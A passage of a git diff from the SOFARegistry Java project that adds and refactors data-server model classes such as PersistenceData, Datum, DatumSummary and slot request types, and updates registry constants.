+ /** + * Setter method for property dataId. + * + * @param dataId value to be assigned to property dataId + */ + public void setDataId(String dataId) { + this.dataId = dataId; + } + + /** + * Getter method for property group. + * + * @return property value of group + */ + public String getGroup() { + return group; + } + + /** + * Setter method for property group. + * + * @param group value to be assigned to property group + */ + public void setGroup(String group) { + this.group = group; + } + + /** + * Getter method for property instanceId. + * + * @return property value of instanceId + */ + public String getInstanceId() { + return instanceId; + } + + /** + * Setter method for property instanceId. + * + * @param instanceId value to be assigned to property instanceId + */ + public void setInstanceId(String instanceId) { + this.instanceId = instanceId; + } + + @Override + public String toString() { + return "PersistenceData{" + + "dataId='" + + dataId + + '\'' + + ", group='" + + group + + '\'' + + ", instanceId='" + + instanceId + + '\'' + + ", version=" + + version + + ", data='" + + data + + '\'' + + '}'; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + PersistenceData that = (PersistenceData) o; + return Objects.equals(dataId, that.dataId) + && Objects.equals(group, that.group) + && Objects.equals(instanceId, that.instanceId) + && Objects.equals(version, that.version) + && data.equals(that.data); + } + + @Override + public int hashCode() { + return Objects.hash(dataId, group, instanceId, version, data); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/console/PersistenceDataBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/console/PersistenceDataBuilder.java new file mode 100644 index 000000000..31b5866d6 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/console/PersistenceDataBuilder.java @@ -0,0 +1,42 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.console; + +import com.alipay.sofa.registry.common.model.store.DataInfo; + +/** + * @author xiaojian.xj + * @version $Id: PersistenceDataBuilder.java, v 0.1 2021年04月07日 20:17 xiaojian.xj Exp $ + */ +public class PersistenceDataBuilder { + + public static PersistenceData createPersistenceData(String dataInfoId, String data) { + DataInfo dataInfo = DataInfo.valueOf(dataInfoId); + PersistenceData persistenceData = new PersistenceData(); + persistenceData.setDataId(dataInfo.getDataId()); + persistenceData.setGroup(dataInfo.getGroup()); + persistenceData.setInstanceId(dataInfo.getInstanceId()); + persistenceData.setData(data); + persistenceData.setVersion(System.currentTimeMillis()); + return persistenceData; + } + + public static String getDataInfoId(PersistenceData persistenceData) { + return DataInfo.toDataInfoId( + persistenceData.getDataId(), persistenceData.getInstanceId(), persistenceData.getGroup()); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/constants/ValueConstants.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/constants/ValueConstants.java index bd6f20409..1c0d63cc9 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/constants/ValueConstants.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/constants/ValueConstants.java @@ -16,44 +16,85 @@ */ package com.alipay.sofa.registry.common.model.constants; +import com.alipay.sofa.registry.common.model.store.DataInfo; + /** - * * @author zhuoyu.sjw * @version $Id: ValueConstants.java, v 0.1 2018-03-28 23:07 zhuoyu.sjw Exp $$ */ public class ValueConstants { - /** - * The constant DEFAULT_GROUP. - */ - public static final String DEFAULT_GROUP = "DEFAULT_GROUP"; + /** connectId: sourceAddress_targetAddress */ + public static final String CONNECT_ID_SPLIT = "_"; + + /** The constant DEFAULT_GROUP. */ + public static final String DEFAULT_GROUP = "DEFAULT_GROUP"; + + /** The constant DEFAULT_ZONE. */ + public static final String DEFAULT_ZONE = "DEFAULT_ZONE"; + + public static final String DEFAULT_INSTANCE_ID = "DEFAULT_INSTANCE_ID"; + + /** The constant DEFAULT_DATA_CENTER. */ + public static final String DEFAULT_DATA_CENTER = "DefaultDataCenter"; + + public static final long DEFAULT_NO_DATUM_VERSION = 1L; + + private static final Integer SYSTEM_RAFT_PORT = Integer.getInteger("RAFT_SERVER_PORT"); + + public static final int RAFT_SERVER_PORT = SYSTEM_RAFT_PORT != null ? SYSTEM_RAFT_PORT : 9614; + + public static final int CROSS_DC_META_SYNC_INTERVAL_MILLI = + Integer.getInteger("CROSS_DC_META_SYNC_INTERVAL_MILLI", 60 * 1000); + + private static final String SYSTEM_RAFT_GROUP = System.getProperty("RAFT_SERVER_GROUP"); + + public static final String RAFT_SERVER_GROUP = + SYSTEM_RAFT_GROUP != null ? SYSTEM_RAFT_GROUP : "RegistryGroup"; - /** - * The constant DEFAULT_ZONE. - */ - public static final String DEFAULT_ZONE = "DEFAULT_ZONE"; + public static final String SESSION_PROVIDE_DATA_GROUP = "CONFIG"; + public static final String SESSION_PROVIDE_DATA_INSTANCE_ID = "9600"; - public static final String DEFAULT_INSTANCE_ID = "DEFAULT_INSTANCE_ID"; + public static final String STOP_PUSH_DATA_SWITCH_DATA_ID = + DataInfo.toDataInfoId( + "session.stop.push.data.switch", + SESSION_PROVIDE_DATA_INSTANCE_ID, + SESSION_PROVIDE_DATA_GROUP); - /** - * The constant DEFAULT_DATA_CENTER. - */ - public static final String DEFAULT_DATA_CENTER = "DefaultDataCenter"; + public static final String BLACK_LIST_DATA_ID = + DataInfo.toDataInfoId( + "session.blacklist.data", SESSION_PROVIDE_DATA_INSTANCE_ID, SESSION_PROVIDE_DATA_GROUP); - public static final long DEFAULT_NO_DATUM_VERSION = 1L; + public static final String DATA_DATUM_SYNC_SESSION_INTERVAL_SEC = + DataInfo.toDataInfoId( + "data.datum.sync.session.interval.sec", + SESSION_PROVIDE_DATA_INSTANCE_ID, + SESSION_PROVIDE_DATA_GROUP); - private static final Integer SYSTEM_RAFT_PORT = Integer - .getInteger("RAFT_SERVER_PORT"); + public static final String DATA_SESSION_LEASE_SEC = + DataInfo.toDataInfoId( + "data.session.lease.sec", SESSION_PROVIDE_DATA_INSTANCE_ID, SESSION_PROVIDE_DATA_GROUP); - public static final int RAFT_SERVER_PORT = SYSTEM_RAFT_PORT != null ? SYSTEM_RAFT_PORT - : 9614; + public static final String REGISTRY_SERVER_BLACK_LIST_DATA_ID = + DataInfo.toDataInfoId( + "registry.server.black.list", + SESSION_PROVIDE_DATA_INSTANCE_ID, + SESSION_PROVIDE_DATA_GROUP); - private static final String SYSTEM_RAFT_GROUP = System - .getProperty("RAFT_SERVER_GROUP"); + public static final String DISABLE_DATA_ID_CASE_SENSITIVE_SWITCH = + "disable.dataId.case.sensitive"; - public static final String RAFT_SERVER_GROUP = SYSTEM_RAFT_GROUP != null ? SYSTEM_RAFT_GROUP - : "RegistryGroup"; + /** + * switch for dataId sensitive is disable or not, default value is false which means dataId is + * case sensitive + */ + public static final boolean DISABLE_DATA_ID_CASE_SENSITIVE = + Boolean.parseBoolean(System.getProperty(DISABLE_DATA_ID_CASE_SENSITIVE_SWITCH)); - public static final String STOP_PUSH_DATA_SWITCH_DATA_ID = "session.stop.push.data.switch#@#9600#@#CONFIG"; + // response status code + public static final int METADATA_STATUS_PROCESS_SUCCESS = 200; + public static final int METADATA_STATUS_DATA_NOT_FOUND = 404; + public static final int METADATA_STATUS_PROCESS_ERROR = 500; + public static final String ATTR_RPC_CHANNEL_PROCESS_ID = "attr.registry.rpc.channel.processId"; } diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/AbstractSlotRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/AbstractSlotRequest.java new file mode 100644 index 000000000..6a7060cf3 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/AbstractSlotRequest.java @@ -0,0 +1,75 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.dataserver; + +import com.alipay.sofa.registry.common.model.ProcessId; +import java.io.Serializable; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-04 16:44 yuzhi.lyz Exp $ + */ +public abstract class AbstractSlotRequest implements Serializable { + protected final ProcessId sessionProcessId; + private final int slotId; + protected long slotTableEpoch; + protected long slotLeaderEpoch; + + protected AbstractSlotRequest(int slotId, ProcessId sessionProcessId) { + this.slotId = slotId; + this.sessionProcessId = sessionProcessId; + } + + /** + * Getter method for property sessionProcessId. + * + * @return property value of sessionProcessId + */ + public ProcessId getSessionProcessId() { + return sessionProcessId; + } + + /** + * Getter method for property slotTableEpoch. + * + * @return property value of slotTableEpoch + */ + public long getSlotTableEpoch() { + return slotTableEpoch; + } + + /** + * Setter method for property slotTableEpoch. + * + * @param slotTableEpoch value to be assigned to property slotTableEpoch + */ + public void setSlotTableEpoch(long slotTableEpoch) { + this.slotTableEpoch = slotTableEpoch; + } + + public long getSlotLeaderEpoch() { + return slotLeaderEpoch; + } + + public void setSlotLeaderEpoch(long slotLeaderEpoch) { + this.slotLeaderEpoch = slotLeaderEpoch; + } + + public int getSlotId() { + return slotId; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/BatchRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/BatchRequest.java new file mode 100644 index 000000000..15b64ea6a --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/BatchRequest.java @@ -0,0 +1,45 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.dataserver; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.collect.Lists; +import java.util.List; + +public class BatchRequest extends AbstractSlotRequest { + private final List request; + + public BatchRequest(ProcessId sessionProcessId, int slotId, List request) { + super(slotId, sessionProcessId); + this.request = Lists.newArrayList(request); + } + + public List getRequest() { + return request; + } + + @Override + public String toString() { + return StringFormatter.format( + "Batch:slotId={},num={},leaderEpoch={},tableEpoch={}", + getSlotId(), + request.size(), + getSlotLeaderEpoch(), + getSlotTableEpoch()); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/ClientOffPublisher.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/ClientOffPublisher.java new file mode 100644 index 000000000..ecdf971b6 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/ClientOffPublisher.java @@ -0,0 +1,64 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.dataserver; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.google.common.collect.Maps; +import java.io.Serializable; +import java.util.*; + +/** + * request to remove data of specific clients immediately + * + * @author qian.lqlq + * @version $Id: ClientOffPublisher.java, v 0.1 2017-12-01 15:48 qian.lqlq Exp $ + */ +public final class ClientOffPublisher implements Serializable { + private static final long serialVersionUID = -3547806571058756207L; + + private final ConnectId connectId; + private final Map> publisherMap = Maps.newHashMap(); + + public ClientOffPublisher(ConnectId connectId) { + this.connectId = connectId; + } + + public void addPublisher(Publisher publisher) { + Map publishers = + publisherMap.computeIfAbsent(publisher.getDataInfoId(), k -> Maps.newHashMap()); + publishers.put(publisher.getRegisterId(), publisher.registerVersion()); + } + + public ConnectId getConnectId() { + return connectId; + } + + public Map> getPublisherMap() { + return publisherMap; + } + + public boolean isEmpty() { + return publisherMap.isEmpty(); + } + + @Override + public String toString() { + return "ClientOff{" + "connId=" + connectId + ", pubs=" + publisherMap + '}'; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/ClientOffRequest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/ClientOffRequest.java deleted file mode 100644 index 0d48ab7ed..000000000 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/ClientOffRequest.java +++ /dev/null @@ -1,96 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.common.model.dataserver; - -import java.io.Serializable; -import java.util.ArrayList; -import java.util.List; - -/** - * request to remove data of specific clients immediately - * - * @author qian.lqlq - * @version $Id: ClientOffRequest.java, v 0.1 2017-12-01 15:48 qian.lqlq Exp $ - */ -public class ClientOffRequest implements Serializable { - - private static final long serialVersionUID = -3547806571058756207L; - - /** - * hosts of clients - */ - private List hosts; - - private long gmtOccur; - - /** - * constructor - */ - public ClientOffRequest() { - } - - /** - * constructor - * @param host - */ - public ClientOffRequest(String host) { - this.hosts = new ArrayList<>(); - this.hosts.add(host); - } - - /** - * Getter method for property hosts. - * - * @return property value of hosts - */ - public List getHosts() { - return hosts; - } - - /** - * Setter method for property hosts. - * - * @param hosts value to be assigned to property hosts - */ - public void setHosts(List hosts) { - this.hosts = hosts; - } - - /** - * Getter method for property gmtOccur. - * - * @return property value of gmtOccur - */ - public long getGmtOccur() { - return gmtOccur; - } - - /** - * Setter method for property gmtOccur. - * - * @param gmtOccur value to be assigned to property gmtOccur - */ - public void setGmtOccur(long gmtOccur) { - this.gmtOccur = gmtOccur; - } - - @Override - public String toString() { - return new StringBuilder("[ClientOffRequest] ips=").append(this.hosts) - .append(", gmtOccur=").append(gmtOccur).toString(); - } -} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/Datum.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/Datum.java index 61044ea8f..de98dfd08 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/Datum.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/Datum.java @@ -18,10 +18,11 @@ import com.alipay.sofa.registry.common.model.store.Publisher; import com.alipay.sofa.registry.common.model.store.WordCache; - +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.google.common.collect.Maps; import java.io.Serializable; +import java.util.Collections; import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; /** * datum store in dataserver @@ -31,239 +32,230 @@ */ public class Datum implements Serializable { - private static final long serialVersionUID = 5307489721610438103L; - - private String dataInfoId; - - private String dataCenter; - - private String dataId; - - private String instanceId; - - private String group; - - private Map pubMap = new ConcurrentHashMap<>(); - - private long version; - - private boolean containsUnPub = false; - - /** - * constructor - */ - public Datum() { - } - - /** - * constructor - * @param dataInfoId - * @param dataCenter - */ - public Datum(String dataInfoId, String dataCenter) { - this.dataInfoId = dataInfoId; - this.dataCenter = WordCache.getInstance().getWordCache(dataCenter); - updateVersion(); - } - - /** - * constructor - * @param publisher - * @param dataCenter - */ - public Datum(Publisher publisher, String dataCenter) { - this(publisher.getDataInfoId(), dataCenter); - this.dataId = publisher.getDataId(); - this.instanceId = publisher.getInstanceId(); - this.group = publisher.getGroup(); - pubMap.put(publisher.getRegisterId(), publisher); - } - - /** - * constructor - * @param publisher - * @param dataCenter - * @param version - */ - public Datum(Publisher publisher, String dataCenter, long version) { - this.dataInfoId = publisher.getDataInfoId(); - this.dataCenter = WordCache.getInstance().getWordCache(dataCenter); - this.version = version; - this.dataId = publisher.getDataId(); - this.instanceId = publisher.getInstanceId(); - this.group = publisher.getGroup(); - pubMap.put(publisher.getRegisterId(), publisher); - } - - public void updateVersion() { - this.version = System.currentTimeMillis(); - } - - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Setter method for property dataInfoId. - * - * @param dataInfoId value to be assigned to property dataInfoId - */ - public void setDataInfoId(String dataInfoId) { - this.dataInfoId = WordCache.getInstance().getWordCache(dataInfoId); - } - - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; + private static final long serialVersionUID = 5307489721610438103L; + + private String dataInfoId; + + private String dataCenter; + + private String dataId; + + private String instanceId; + + private String group; + // key=registerId + private final Map pubMap = Maps.newHashMap(); + + private long version; + + /** constructor */ + public Datum() {} + + /** + * constructor + * + * @param dataInfoId + * @param dataCenter + */ + public Datum(String dataInfoId, String dataCenter) { + this.dataInfoId = WordCache.getWordCache(dataInfoId); + this.dataCenter = WordCache.getWordCache(dataCenter); + updateVersion(); + } + + /** + * constructor + * + * @param publisher + * @param dataCenter + */ + public Datum(Publisher publisher, String dataCenter) { + this(publisher.getDataInfoId(), dataCenter); + this.dataId = publisher.getDataId(); + this.instanceId = publisher.getInstanceId(); + this.group = publisher.getGroup(); + addPublisher(publisher); + } + + /** + * constructor + * + * @param publisher + * @param dataCenter + * @param version + */ + public Datum(Publisher publisher, String dataCenter, long version) { + this.dataInfoId = publisher.getDataInfoId(); + this.dataCenter = WordCache.getWordCache(dataCenter); + this.version = version; + this.dataId = publisher.getDataId(); + this.instanceId = publisher.getInstanceId(); + this.group = publisher.getGroup(); + addPublisher(publisher); + } + + public void updateVersion() { + if (DatumVersionUtil.useConfregVersionGen()) { + this.version = DatumVersionUtil.confregNextId(0); + } else { + this.version = DatumVersionUtil.nextId(); } - - /** - * Setter method for property dataCenter. - * - * @param dataCenter value to be assigned to property dataCenter - */ - public void setDataCenter(String dataCenter) { - this.dataCenter = WordCache.getInstance().getWordCache(dataCenter); - } - - /** - * Getter method for property dataId. - * - * @return property value of dataId - */ - public String getDataId() { - return dataId; - } - - /** - * Setter method for property dataId. - * - * @param dataId value to be assigned to property dataId - */ - public void setDataId(String dataId) { - this.dataId = WordCache.getInstance().getWordCache(dataId); - } - - /** - * Getter method for property instanceId. - * - * @return property value of instanceId - */ - public String getInstanceId() { - return instanceId; - } - - /** - * Setter method for property instanceId. - * - * @param instanceId value to be assigned to property instanceId - */ - public void setInstanceId(String instanceId) { - this.instanceId = WordCache.getInstance().getWordCache(instanceId); - } - - /** - * Getter method for property group. - * - * @return property value of group - */ - public String getGroup() { - return group; - } - - /** - * Setter method for property group. - * - * @param group value to be assigned to property group - */ - public void setGroup(String group) { - this.group = WordCache.getInstance().getWordCache(group); - } - - /** - * Getter method for property pubMap. - * - * @return property value of pubMap - */ - public Map getPubMap() { - return pubMap; - } - - /** - * Setter method for property pubMap. - * - * @param pubMap value to be assigned to property pubMap - */ - public void setPubMap(Map pubMap) { - this.pubMap = pubMap; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public long getVersion() { - return version; + } + + /** + * Getter method for property dataInfoId. + * + * @return property value of dataInfoId + */ + public String getDataInfoId() { + return dataInfoId; + } + + /** + * Setter method for property dataInfoId. + * + * @param dataInfoId value to be assigned to property dataInfoId + */ + public void setDataInfoId(String dataInfoId) { + this.dataInfoId = WordCache.getWordCache(dataInfoId); + } + + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + /** + * Setter method for property dataCenter. + * + * @param dataCenter value to be assigned to property dataCenter + */ + public void setDataCenter(String dataCenter) { + this.dataCenter = WordCache.getWordCache(dataCenter); + } + + /** + * Getter method for property dataId. + * + * @return property value of dataId + */ + public String getDataId() { + return dataId; + } + + /** + * Setter method for property dataId. + * + * @param dataId value to be assigned to property dataId + */ + public void setDataId(String dataId) { + this.dataId = WordCache.getWordCache(dataId); + } + + /** + * Getter method for property instanceId. + * + * @return property value of instanceId + */ + public String getInstanceId() { + return instanceId; + } + + /** + * Setter method for property instanceId. + * + * @param instanceId value to be assigned to property instanceId + */ + public void setInstanceId(String instanceId) { + this.instanceId = WordCache.getWordCache(instanceId); + } + + /** + * Getter method for property group. + * + * @return property value of group + */ + public String getGroup() { + return group; + } + + /** + * Setter method for property group. + * + * @param group value to be assigned to property group + */ + public void setGroup(String group) { + this.group = WordCache.getWordCache(group); + } + + /** + * Getter method for property version. + * + * @return property value of version + */ + public long getVersion() { + return version; + } + + /** + * Setter method for property version. + * + * @param version value to be assigned to property version + */ + public void setVersion(long version) { + this.version = version; + } + + @Override + public String toString() { + StringBuilder sb = new StringBuilder(128); + sb.append("Datum={") + .append(dataInfoId) + .append(", dataCenter=") + .append(dataCenter) + .append(", size=") + .append(publisherSize()) + .append(", ver=") + .append(version) + .append('}'); + return sb.toString(); + } + + public synchronized boolean addPublisher(Publisher publisher) { + Publisher existing = pubMap.computeIfAbsent(publisher.getRegisterId(), k -> publisher); + if (existing == publisher) { + return true; } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(long version) { - this.version = version; + if (!existing.registerVersion().orderThan(publisher.registerVersion())) { + return false; } + pubMap.put(publisher.getRegisterId(), publisher); + return true; + } - /** - * Getter method for property containsUnPub. - * - * @return property value of containsUnPub - */ - public boolean isContainsUnPub() { - return containsUnPub; - } + public synchronized int publisherSize() { + return pubMap.size(); + } - /** - * Setter method for property containsUnPub. - * - * @param containsUnPub value to be assigned to property containsUnPub - */ - public void setContainsUnPub(boolean containsUnPub) { - this.containsUnPub = containsUnPub; + public synchronized void addPublishers(Map publisherMap) { + if (publisherMap != null) { + publisherMap.values().forEach(p -> addPublisher(p)); } + } - public static Datum processDatum(Datum datum) { - datum.setDataCenter(datum.getDataCenter()); - datum.setDataInfoId(datum.getDataInfoId()); - datum.setDataId(datum.getDataId()); - datum.setGroup(datum.getGroup()); - datum.setInstanceId(datum.getInstanceId()); - - Map pubMap = datum.getPubMap(); - if (pubMap != null && !pubMap.isEmpty()) { - pubMap.forEach((registerId, publisher) -> Publisher.processPublisher(publisher)); - } - - return datum; - } + public synchronized Map getPubMap() { + return Collections.unmodifiableMap(Maps.newHashMap(pubMap)); + } - @Override - public String toString() { - StringBuilder sb = new StringBuilder("[Datum] dataInfoId=").append(dataInfoId) - .append(", dataId=").append(dataId).append(", dataCenter=").append(dataCenter) - .append(", instanceId=").append(instanceId).append(", version=").append(version) - .append(", pubMap=").append(pubMap); - return sb.toString(); + /** should not call that, just for json serde */ + public synchronized void setPubMap(Map pubMap) { + this.pubMap.clear(); + if (pubMap != null) { + this.pubMap.putAll(pubMap); } + } } diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/DatumDigest.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/DatumDigest.java new file mode 100644 index 000000000..cfe7afb8e --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/DatumDigest.java @@ -0,0 +1,81 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.dataserver; + +import com.alipay.sofa.registry.util.StringFormatter; +import java.io.Serializable; +import java.util.Objects; + +public final class DatumDigest implements Serializable { + private final long publisherIdSign; + private final long publisherVerSign; + private final long publisherTimestampSign; + private final int publisherNum; + private final short maxTimestamp; + private final short minTimestamp; + + public DatumDigest( + int publisherNum, + long publisherIdSign, + long publisherVerSign, + long publisherTimestampSign, + short maxTimestamp, + short minTimestamp) { + this.publisherNum = publisherNum; + this.publisherIdSign = publisherIdSign; + this.publisherVerSign = publisherVerSign; + this.publisherTimestampSign = publisherTimestampSign; + this.maxTimestamp = maxTimestamp; + this.minTimestamp = minTimestamp; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + DatumDigest that = (DatumDigest) o; + return publisherIdSign == that.publisherIdSign + && publisherVerSign == that.publisherVerSign + && publisherTimestampSign == that.publisherTimestampSign + && publisherNum == that.publisherNum + && maxTimestamp == that.maxTimestamp + && minTimestamp == that.minTimestamp; + } + + @Override + public int hashCode() { + return Objects.hash( + publisherIdSign, + publisherVerSign, + publisherTimestampSign, + publisherNum, + maxTimestamp, + minTimestamp); + } + + @Override + public String toString() { + return StringFormatter.format( + "Digest{num={},idSign={},verSign={},tsSign={},maxTs={},minTs={}", + publisherNum, + publisherIdSign, + publisherVerSign, + publisherTimestampSign, + maxTimestamp, + minTimestamp); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/DatumSummary.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/DatumSummary.java new file mode 100644 index 000000000..94fa2b55d --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/DatumSummary.java @@ -0,0 +1,104 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.dataserver; + +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.google.common.collect.Maps; +import java.io.Serializable; +import java.util.Collection; +import java.util.Collections; +import java.util.Map; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-05 14:27 yuzhi.lyz Exp $ + */ +public class DatumSummary implements Serializable { + private final String dataInfoId; + private final Map publisherVersions; + + public DatumSummary( + String dataInfoId, Map publisherVersions) { + this.dataInfoId = dataInfoId; + this.publisherVersions = Collections.unmodifiableMap(publisherVersions); + } + + public DatumSummary(String dataInfoId) { + this.dataInfoId = dataInfoId; + this.publisherVersions = Collections.emptyMap(); + } + + public static DatumSummary of(String dataInfoId, Map publisherMap) { + Map versionMap = Maps.newHashMapWithExpectedSize(publisherMap.size()); + for (Map.Entry e : publisherMap.entrySet()) { + versionMap.put(e.getKey(), e.getValue().registerVersion()); + } + return new DatumSummary(dataInfoId, versionMap); + } + + /** + * Getter method for property dataInfoId. + * + * @return property value of dataInfoId + */ + public String getDataInfoId() { + return dataInfoId; + } + + /** + * Getter method for property publisherVersions. + * + * @return property value of publisherVersions + */ + public Map getPublisherVersions() { + return publisherVersions; + } + + public Map getPublisherVersions(Collection registerIds) { + Map m = Maps.newHashMapWithExpectedSize(registerIds.size()); + for (String registerId : registerIds) { + RegisterVersion v = publisherVersions.get(registerId); + if (v == null) { + throw new IllegalArgumentException("not contains registerId:" + registerId); + } + m.put(registerId, v); + } + return m; + } + + public boolean isEmpty() { + return publisherVersions.isEmpty(); + } + + public int size() { + return publisherVersions.size(); + } + + public static int countPublisherSize(Collection summaries) { + int count = 0; + for (DatumSummary summary : summaries) { + count += summary.size(); + } + return count; + } + + @Override + public String toString() { + return String.format("Summary={%s=%d}", dataInfoId, size()); + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/DatumVersion.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/DatumVersion.java new file mode 100644 index 000000000..d2ff0944c --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/dataserver/DatumVersion.java @@ -0,0 +1,63 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this 